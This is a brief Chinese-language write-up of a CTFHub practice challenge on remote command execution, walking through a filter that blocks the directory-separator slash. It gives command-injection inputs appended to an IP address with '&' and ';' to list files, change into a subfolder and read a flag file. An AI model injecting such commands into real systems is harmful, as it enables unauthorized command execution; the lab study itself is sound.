CTFHub_技能树_Web之RCE——“过滤目录分隔符”

–>CTFHub传送门<–

使用工具

  1. Microsoft Edge v84.0.522.40

解题过程

127.0.0.1&ls查看当前目录结构
CTFHub_技能树_Web之RCE——“过滤目录分隔符”
flag需要跳转到子文件夹里
而目录分隔符斜杠被过滤了
因此我们使用cd进入子文件夹,而不是直接cat访问
输入127.0.0.1;cd flag_is_here;ls进入子文件夹并查询,使用分号间隔
CTFHub_技能树_Web之RCE——“过滤目录分隔符”
127.0.0.1;cd flag_is_here;cat flag_xxx.php访问得到FLAG,位于注释里
CTFHub_技能树_Web之RCE——“过滤目录分隔符”

欢迎在评论区留言
感谢浏览